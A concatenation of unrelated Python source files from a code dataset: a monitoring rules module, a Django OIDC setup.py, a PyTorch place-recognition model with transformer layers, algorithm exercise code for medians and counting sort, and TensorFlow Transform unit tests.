if action.atype == 'command':
return 'command'
if action.atype == 'machine_action':
return action.action
if action.atype == 'notification':
return 'alert'
class MachineMetricRule(ResourceRule):
_data_type_str = 'metrics'
@property
def _backend_plugin(self):
if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
return GraphiteBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
return InfluxDBBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
return FoundationDBBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
return VictoriaMetricsBackendPlugin
raise Exception()
def clean(self):
super(MachineMetricRule, self).clean()
if self.resource_model_name != 'machine':
raise me.ValidationError(
'Invalid resource type "%s". %s can only operate on machines' %
(self.resource_model_name, self.__class__.__name__))
class NoDataRule(MachineMetricRule):
_controller_cls = NoDataRuleController
@property
def _backend_plugin(self):
if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
return GraphiteNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
return InfluxDBNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
return FoundationDBNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
return VictoriaMetricsNoDataPlugin
raise Exception()
# FIXME All following properties are for backwards compatibility.
# However, this rule is not meant to match any queries, but to be
# used internally, thus the `None`s.
@property
def metric(self):
return None
@property
def operator(self):
return None
@property
def value(self):
return None
@property
def aggregate(self):
return None
@property
def reminder_offset(self):
return None
@property
def action(self):
return ''
class ResourceLogsRule(ResourceRule):
_data_type_str = 'logs'
_backend_plugin = ElasticSearchBackendPlugin
class ArbitraryLogsRule(ArbitraryRule):
_data_type_str = 'logs'
_backend_plugin = ElasticSearchBackendPlugin
def _populate_rules():
"""Populate RULES with mappings from rule type to rule subclass.
RULES is a mapping (dict) from rule types to subclasses of Rule.
A rule's type is the concat of two strings: <str1>-<str2>, where
str1 denotes whether the rule is arbitrary or not and str2 equals
the `_data_type_str` class attribute of the rule, which is simply
the type of the requesting data, like logs or monitoring metrics.
The aforementioned concatenation is simply a way to categorize a
rule, such as saying a rule on arbitrary logs or a resource-bound
rule referring to the monitoring data of machine A.
"""
public_rule_map = {}
hidden_rule_cls = (ArbitraryRule, ResourceRule, NoDataRule, )
for key, value in list(globals().items()):
if not key.endswith('Rule'):
continue
if value in hidden_rule_cls:
continue
if not issubclass(value, (ArbitraryRule, ResourceRule, )):
continue
str1 = 'resource' if issubclass(value, ResourceRule) else 'arbitrary'
rule_key = '%s-%s' % (str1, value._data_type_str)
public_rule_map[rule_key] = value
return public_rule_map
RULES = _populate_rules()
| 1.625 | 2 |
setup.py | andrewwhitehead/django-oidc-rp | 20 | 16957 | <reponame>andrewwhitehead/django-oidc-rp<gh_stars>10-100
# -*- coding: utf-8 -*-
import codecs
from os.path import abspath
from os.path import dirname
from os.path import join
from setuptools import find_packages
from setuptools import setup
import oidc_rp
def read_relative_file(filename):
""" Returns contents of the given file, whose path is supposed relative to this module. """
with codecs.open(join(dirname(abspath(__file__)), filename), encoding='utf-8') as f:
return f.read()
setup(
name='django-oidc-rp',
version=oidc_rp.__version__,
author='impak Finance',
author_email='<EMAIL>',
packages=find_packages(exclude=['tests.*', 'tests']),
include_package_data=True,
url='https://github.com/impak-finance/django-oidc-rp',
license='MIT',
description='A server side OpenID Connect Relying Party (RP/Client) implementation for Django.',
long_description=read_relative_file('README.rst'),
keywords='django openidconnect oidc client rp authentication auth',
zip_safe=False,
install_requires=[
'django>=1.11',
'jsonfield2',
'pyjwkest>=1.4',
'requests>2.0',
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| 1.898438 | 2 |
nndet/evaluator/detection/__init__.py | joeranbosma/nnDetection | 242 | 16958 | <reponame>joeranbosma/nnDetection<gh_stars>100-1000
from nndet.evaluator.detection.froc import FROCMetric
from nndet.evaluator.detection.coco import COCOMetric
from nndet.evaluator.detection.hist import PredictionHistogram
| 1.179688 | 1 |
tests/test_update.py | sosie-js/ankisync2 | 39 | 16959 | # from ankisync2.apkg import Apkg, db
# Has to be done through normal database methods
# def test_update():
# apkg = Apkg("example1.apkg")
# for n in db.Notes.filter(db.Notes.data["field1"] == "data1"):
# n.data["field3"] = "data2"
# n.save()
# apkg.close()
| 2.46875 | 2 |
lib/place_model.py | ihaeyong/drama-graph | 3 | 16960 | import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
def label_mapping(target):
temp = []
for idx in range(len(target)):
if target[idx][0][:3] == 'con':
target[idx][0] = 'convenience store'
temp.append(label_dict[target[idx][0]])
return temp
def label_remapping(target):
inv_label_dict = {v: k for k, v in label_dict_wo_none.items()}
temp = []
for idx in range(len(target)):
temp.append(inv_label_dict[target[idx]])
return temp
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def place_buffer(images_norm, buffer_images):
if len(buffer_images) == 0:
buffer_images = images_norm
if len(buffer_images) < 10:
for idx in range(10-len(buffer_images)):
buffer_images = [images_norm[0]] + buffer_images
assert len(buffer_images) == 10, 'Buffer failed'
return buffer_images
class AverageMeter(object):
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]
def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
labels: A int tensor of size [batch].
logits: A float tensor of size [batch, no_of_classes].
samples_per_cls: A python list of size [no_of_classes].
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
effective_num = 1.0 - np.power(beta, samples_per_cls)
weights = (1.0 - beta) / np.array(effective_num)
weights = weights / np.sum(weights) * no_of_classes
labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()
weights = torch.tensor(weights).float()
weights = weights.unsqueeze(0)
weights = weights.repeat(labels_one_hot.shape[0],1) * labels_one_hot
weights = weights.sum(1)
weights = weights.unsqueeze(1)
weights = weights.repeat(1,no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
elif loss_type == "sigmoid":
cb_loss = F.binary_cross_entropy_with_logits(input = logits,target = labels_one_hot, weights = weights)
elif loss_type == "softmax":
pred = logits.softmax(dim = 1)
cb_loss = F.binary_cross_entropy(input = pred, target = labels_one_hot.cuda(), weight = weights.cuda())
return cb_loss
def focal_loss(labels, logits, alpha, gamma):
"""Compute the focal loss between `logits` and the ground truth `labels`.
Focal loss = -alpha_t * (1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
pt = p (if true class), otherwise pt = 1 - p. p = sigmoid(logit).
Args:
labels: A float tensor of size [batch, num_classes].
logits: A float tensor of size [batch, num_classes].
alpha: A float tensor of size [batch_size]
specifying per-example weight for balanced cross entropy.
gamma: A float scalar modulating loss from hard and easy examples.
Returns:
focal_loss: A float32 scalar representing normalized total loss.
"""
BCLoss = F.binary_cross_entropy_with_logits(input = logits, target = labels,reduction = "none")
if gamma == 0.0:
modulator = 1.0
else:
modulator = torch.exp(-gamma * labels * logits - gamma * torch.log(1 +
torch.exp(-1.0 * logits)))
loss = modulator * BCLoss
weighted_loss = alpha * loss
focal_loss = torch.sum(weighted_loss)
focal_loss /= torch.sum(labels)
return focal_loss
class place_model(nn.Module):
def __init__(self, num_persons, num_faces, device):
super(place_model, self).__init__()
pre_model = Yolo(num_persons).cuda(device)
num_face_cls = num_faces
self.detector = YoloD(pre_model).cuda(device)
self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
self.avgpool = nn.AvgPool2d(7, stride=1)
# self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
# self.bert_fc1 = torch.nn.Linear(128, 768)
# self.bert_fc2 = torch.nn.Linear(768, 128)
self.bert = BERT()
self.fc2 = torch.nn.Linear(128, 1)
self.fc3 = torch.nn.Linear(128, 22)
self.softmax = torch.nn.Softmax(dim=1)
# # define face
# self.face_conv = nn.Conv2d(
# 1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)
def forward(self, image):
N, T , C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
image = image.reshape(N*T, C, H, W)
# feature map of backbone
fmap, output_1 = self.detector(image)
fmap = self.place_conv(fmap)
x = self.avgpool(fmap)
x = x.reshape(N, T, -1)
# self.lstm_sc.flatten_parameters()
# N, T = x.size(0), x.size(1)
# x = self.lstm_sc(x)[0]
# x = self.bert_fc1(x)
x = self.bert(x)
# x = self.bert_fc2(x)
change = x.reshape(N*T, -1)
#x = self.fc1(x)
change = self.fc2(change)
change = change.reshape(N, T)
#x = x.reshape(N*T, -1)
M, _ = change.max(1)
w = change - M.view(-1,1)
w = w.exp()
w = w.unsqueeze(1).expand(-1,w.size(1),-1)
w = w.triu(1) - w.tril()
w = w.cumsum(2)
w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
ww = w.new_empty(w.size())
idx = M>=0
ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
idx = ~idx
ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
ww = (ww+1e-10).pow(-1)
ww = ww/ww.sum(1,True)
x = ww.transpose(1,2).bmm(x)
x = x.reshape(N*T, -1)
x = self.fc3(x)
x = x.reshape(N*T, -1)
return x
class BERT(nn.Module):
"""
BERT model : Bidirectional Encoder Representations from Transformers.
"""
def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
"""
:param vocab_size: vocab_size of total words
:param hidden: BERT model hidden size
:param n_layers: numbers of Transformer blocks(layers)
:param attn_heads: number of attention heads
:param dropout: dropout rate
"""
super(BERT, self).__init__()
self.hidden = hidden
self.n_layers = n_layers
self.attn_heads = attn_heads
# paper noted they used 4*hidden_size for ff_network_hidden_size
self.feed_forward_hidden = hidden * 4
# embedding for BERT, sum of positional, segment, token embeddings
self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)
# multi-layers transformer blocks, deep network
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden, attn_heads, hidden * 4, dropout) for _ in range(n_layers)])
def forward(self, x):
# attention masking for padded token
# torch.ByteTensor([batch_size, 1, seq_len, seq_len])
# mask = (x > 0).unsqueeze(1).repeat(1, x.size(1), 1).unsqueeze(1)
# embedding the indexed sequence to sequence of vectors
x = self.embedding(x)
# running over multiple transformer blocks
for transformer in self.transformer_blocks:
# x = transformer.forward(x, mask)
x = transformer.forward(x, None)
return x
class BERTEmbedding(nn.Module):
"""
BERT Embedding which is consisted with under features
1. TokenEmbedding : normal embedding matrix
2. PositionalEmbedding : adding positional information using sin, cos
2. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
sum of all these features are output of BERTEmbedding
"""
def __init__(self, vocab_size, embed_size, dropout=0.):
"""
:param vocab_size: total vocab size
:param embed_size: embedding size of token embedding
:param dropout: dropout rate
"""
super(BERTEmbedding, self).__init__()
# self.token = TokenEmbedding(vocab_size=vocab_size, embed_size=embed_size)
# self.position = PositionalEmbedding(d_model=self.token.embedding_dim)
# self.segment = SegmentEmbedding(embed_size=self.token.embedding_dim)
self.position = PositionalEmbedding(d_model=embed_size)
self.dropout = nn.Dropout(p=dropout)
self.embed_size = embed_size
def forward(self, sequence):
# x = self.token(sequence) + self.position(sequence) + self.segment(segment_label)
x = sequence + self.position(sequence)
return self.dropout(x)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model, max_len=512):
super(PositionalEmbedding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model).float()
pe.require_grad = False
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = (torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model)).exp()
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
return self.pe[:, :x.size(1)]
class TransformerBlock(nn.Module):
"""
Bidirectional Encoder = Transformer (self-attention)
Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
"""
def __init__(self, hidden, attn_heads, feed_forward_hidden, dropout):
"""
:param hidden: hidden size of transformer
:param attn_heads: head sizes of multi-head attention
:param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
:param dropout: dropout rate
"""
super(TransformerBlock, self).__init__()
self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
self.feed_forward = PositionwiseFeedForward(d_model=hidden, d_ff=feed_forward_hidden, dropout=dropout)
self.input_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.output_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.dropout = nn.Dropout(p=dropout)
def forward(self, x, mask):
x = self.input_sublayer(x, lambda _x: self.attention.forward(_x, _x, _x, mask=mask))
x = self.output_sublayer(x, self.feed_forward)
return self.dropout(x)
class MultiHeadedAttention(nn.Module):
"""
Take in model size and number of heads.
"""
def __init__(self, h, d_model, dropout=0.1):
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
self.output_linear = nn.Linear(d_model, d_model)
self.attention = Attention()
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
batch_size = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = [l(x).view(batch_size, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linear_layers, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
x, attn = self.attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)
return self.output_linear(x)
class Attention(nn.Module):
"""
Compute 'Scaled Dot Product Attention'
"""
def __init__(self):
super(Attention, self).__init__()
def forward(self, query, key, value, mask=None, dropout=None):
scores = torch.matmul(query, key.transpose(-2, -1))/math.sqrt(query.size(-1))
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
p_attn = F.softmax(scores, dim=-1)
if dropout is not None:
p_attn = dropout(p_attn)
return torch.matmul(p_attn, value), p_attn
class PositionwiseFeedForward(nn.Module):
"Implements FFN equation."
def __init__(self, d_model, d_ff, dropout=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
#self.activation = nn.GELU()
self.activation = nn.ReLU()
def forward(self, x):
return self.w_2(self.dropout(self.activation(self.w_1(x))))
class SublayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = nn.LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
| 1.921875 | 2 |
ch01/challenge.py | laszlokiraly/LearningAlgorithms | 0 | 16961 | """
Challenge Exercises for Chapter 1.
"""
import random
import timeit
from algs.table import DataTable, ExerciseNum, caption
from algs.counting import RecordedItem
def partition(A, lo, hi, idx):
"""
Partition using A[idx] as value. Note lo and hi are INCLUSIVE on both
ends and idx must be valid index. Count the number of comparisons
by populating A with RecordedItem instances.
"""
if lo == hi:
return lo
A[idx],A[lo] = A[lo],A[idx] # swap into position
i = lo
j = hi + 1
while True:
while True:
i += 1
if i == hi: break
if A[lo] < A[i]: break
while True:
j -= 1
if j == lo: break
if A[j] < A[lo]: break
# doesn't count as comparing two values
if i >= j: break
A[i],A[j] = A[j],A[i]
A[lo],A[j] = A[j],A[lo]
return j
def linear_median(A):
"""
Efficient implementation that returns median value in arbitrary list,
assuming A has an odd number of values. Note this algorithm will
rearrange values in A.
"""
# if len(A) % 2 == 0:
# raise ValueError('linear_median() only coded to work with odd number of values.')
lo = 0
hi = len(A) - 1
mid = hi // 2
while lo < hi:
idx = random.randint(lo, hi) # select valid index randomly
j = partition(A, lo, hi, idx)
if j == mid:
return A[j]
if j < mid:
lo = j+1
else:
hi = j-1
return A[lo]
def median_from_sorted_list(A):
sorted_A = sorted(A)
len_A = len(A)
if len_A % 2 == 0:
return (sorted_A[(len_A//2) - 1] + sorted_A[len_A//2]) / 2
else:
return sorted_A[len_A//2]
def counting_sort(A, M):
"""
Update A in place to be sorted in ascending order if all elements
are guaranteed to be in the range 0 to and not including M.
"""
counts = [0] * M
for v in A:
counts[v] += 1
pos = 0
v = 0
while pos < len(A):
for idx in range(counts[v]):
A[pos+idx] = v
pos += counts[v]
v += 1
def counting_sort_improved(A,M):
"""
Update A in place to be sorted in ascending order if all elements
are guaranteed to be in the range 0 to and not including M.
"""
counts = [0] * M
for val in A:
counts[val] += 1
pos = 0
val = 0
while pos < len(A):
if counts[val] > 0:
A[pos:pos+counts[val]] = [val] * counts[val]
pos += counts[val]
val += 1
def run_counting_sort_trials(max_k=15, output=True):
"""Generate table for counting sort up to (but not including) max_k=15."""
tbl = DataTable([8,15,15],
['N', 'counting_sort', 'counting_sort_improved'], output=output)
M = 20 # arbitrary value, and results are dependent on this value.
trials = [2**k for k in range(8, max_k)]
for n in trials:
t_cs = min(timeit.repeat(stmt='counting_sort(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
t_csi = min(timeit.repeat(stmt='counting_sort_improved(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort_improved
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
tbl.row([n, t_cs, t_csi])
return tbl
def run_median_trial():
"""Generate table for Median Trial."""
tbl = DataTable([10,15,15],['N', 'median_time', 'sort_median'])
trials = [2**k+1 for k in range(8,20)]
for n in trials:
t_med = 1000*min(timeit.repeat(stmt='assert(linear_median(a) == {}//2)'.format(n),
setup='''
import random
from ch01.challenge import linear_median
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
t_sort = 1000*min(timeit.repeat(stmt='assert(median_from_sorted_list(a) == {0}//2)'.format(n),
setup='''
import random
from ch01.challenge import median_from_sorted_list
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
tbl.row([n, t_med, t_sort])
return tbl
def run_median_less_than_trial(max_k=20, output=True):
"""Use RecordedItem to count # of times Less-than invoked up to (but not including) max_k=20."""
tbl = DataTable([10,15,15],['N', 'median_count', 'sort_median_count'], output=output)
tbl.format('median_count', ',d')
tbl.format('sort_median_count', ',d')
trials = [2**k+1 for k in range(8, max_k)]
for n in trials:
A = list([RecordedItem(i) for i in range(n)])
random.shuffle(A)
# Generated external sorted to reuse list
RecordedItem.clear()
med2 = median_from_sorted_list(A)
sort_lt = RecordedItem.report()[1]
RecordedItem.clear()
med1 = linear_median(A)
lin_lt = RecordedItem.report()[1]
assert med1 == med2
tbl.row([n, lin_lt, sort_lt])
return tbl
def is_palindrome1(w):
"""Create slice with negative step and confirm equality with w."""
return w[::-1] == w
def is_palindrome2(w):
"""Strip outermost characters if same, return false when mismatch."""
while len(w) > 1:
if w[0] != w[-1]: # if mismatch, return False
return False
w = w[1:-1] # strip characters on either end; repeat
return True # must have been a Palindrome
def is_palindrome3(w):
"""iterate from start and from end and compare, without copying arrays"""
for i in range(0,round(len(w)/2)):
if w[i] != w[-(i+1)]:
return False
return True # must have been a Palindrome
def is_palindrome_letters_only(s):
"""
Confirm Palindrome, even when string contains non-alphabet letters
and ignore capitalization.
casefold() method, which was introduced in Python 3.3, could be
used instead of this older method, which converts to lower().
"""
i = 0
j = hi = len(s) - 1
while i < j:
# This type of logic appears in partition.
# Find alpha characters and compare
while not s[i].isalpha():
i += 1
if i == hi: break
while not s[j].isalpha():
j -= 1
if j == 0: break
if s[i].lower() != s[j].lower(): return False
i += 1
j -= 1
return True
def tournament_allows_odd(A):
"""
Returns two largest values in A. Works for odd lists
"""
from ch01.largest_two import Match
if len(A) < 2:
raise ValueError('Must have at least two values')
tourn = []
for i in range(0, len(A)-1, 2):
tourn.append(Match(A[i], A[i+1]))
odd_one_out = None
if len(A) % 2 == 1:
odd_one_out = A[-1]
while len(tourn) > 1:
tourn.append(Match.advance(tourn[0], tourn[1]))
del tourn[0:2]
# Find where second is hiding!
m = tourn[0]
largest = m.larger
second = m.smaller
# Wait until the end, and see where it belongs
if odd_one_out:
if odd_one_out > largest:
largest,second = odd_one_out,largest
elif odd_one_out > second:
second = odd_one_out
while m.prior:
m = m.prior
if second < m.smaller:
second = m.smaller
return (largest,second)
def two_largest_attempt(A):
"""Failed attempt to implement two largest."""
m1 = max(A[:len(A)//2])
m2 = max(A[len(A)//2:])
if m1 < m2:
return (m2, m1)
return (m1, m2)
#######################################################################
if __name__ == '__main__':
chapter = 1
with ExerciseNum(1) as exercise_number:
sample = 'A man, a plan, a canal. Panama!'
print(sample,'is a palindrome:', is_palindrome_letters_only(sample))
print(caption(chapter, exercise_number),
'Palindrome Detector')
with ExerciseNum(2) as exercise_number:
run_median_less_than_trial()
print()
run_median_trial()
print(caption(chapter, exercise_number),
'Median Counting')
with ExerciseNum(3) as exercise_number:
run_counting_sort_trials()
print(caption(chapter, exercise_number),
'Counting Sort Trials')
with ExerciseNum(4) as exercise_number:
print('see tournament_allows_odd in ch01.challenge')
print(caption(chapter, exercise_number),
'Odd tournament')
with ExerciseNum(5) as exercise_number:
print('Should print (9, 8)', two_largest_attempt([9, 3, 5, 7, 8, 1]))
print('Fails to print (9, 8)', two_largest_attempt([9, 8, 5, 7, 3, 1]))
print(caption(chapter, exercise_number),
'Failed Two largest')
| 3.671875 | 4 |
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py | mace84/script-languages | 0 | 16962 | from typing import Dict
from exaslct_src.lib.data.image_info import ImageInfo
from exaslct_src.lib.data.dependency_collector.dependency_collector import DependencyInfoCollector
class DependencyImageInfoCollector(DependencyInfoCollector[ImageInfo]):
def is_info(self, input):
return isinstance(input, Dict) and IMAGE_INFO in input
def read_info(self, value) -> ImageInfo:
with value[IMAGE_INFO].open("r") as file:
return ImageInfo.from_json(file.read())
IMAGE_INFO = "image_info"
| 2.5625 | 3 |
tensorflow_transform/test_case_test.py | LaudateCorpus1/transform | 970 | 16963 | <gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_transform.test_case."""
import re
from tensorflow_transform import test_case
import unittest
class TftUnitTest(test_case.TransformTestCase):
def testCrossNamedParameters(self):
test_cases_1 = [
{'testcase_name': 'a_1_b_1', 'a': 1, 'b': 1},
{'testcase_name': 'a_3_b_3', 'a': 3, 'b': 3},
]
test_cases_2 = [
{'testcase_name': 'c_2', 'c': 2},
{'testcase_name': 'c_4', 'c': 4},
]
expected_cross = [
{'testcase_name': 'a_1_b_1_c_2', 'a': 1, 'b': 1, 'c': 2},
{'testcase_name': 'a_1_b_1_c_4', 'a': 1, 'b': 1, 'c': 4},
{'testcase_name': 'a_3_b_3_c_2', 'a': 3, 'b': 3, 'c': 2},
{'testcase_name': 'a_3_b_3_c_4', 'a': 3, 'b': 3, 'c': 4},
]
self.assertEqual(
test_case.cross_named_parameters(test_cases_1, test_cases_2),
expected_cross)
def testCrossParameters(self):
test_cases_1 = [('a', 1), ('b', 2)]
test_cases_2 = [(True,), (False,)]
expected_cross = [
('a', 1, True), ('b', 2, True),
('a', 1, False), ('b', 2, False),
]
self.assertCountEqual(
test_case.cross_parameters(test_cases_1, test_cases_2), expected_cross)
def testAssertDataCloseOrEqual(self):
self.assertDataCloseOrEqual([{'a': 'first',
'b': 1.0,
'c': 5,
'd': ('second', 2.0)},
{'e': 2,
'f': 3}],
[{'a': 'first',
'b': 1.0000001,
'c': 5,
'd': ('second', 2.0000001)},
{'e': 2,
'f': 3}])
with self.assertRaisesRegexp(AssertionError, r'len\(.*\) != len\(\[\]\)'):
self.assertDataCloseOrEqual([{'a': 1}], [])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Element counts were not equal.*: Row 0', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'b': 1}])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Not equal to tolerance.*: Row 0, key a', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'a': 2}])
@test_case.parameters((1, 'a'), (2, 'b'))
def testSampleParametrizedTestMethod(self, my_arg, my_other_arg):
self.assertIn((my_arg, my_other_arg), {(1, 'a'), (2, 'b')})
if __name__ == '__main__':
unittest.main()
| 2.15625 | 2 |
metageta/icons.py | ssutee/metageta | 0 | 16964 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
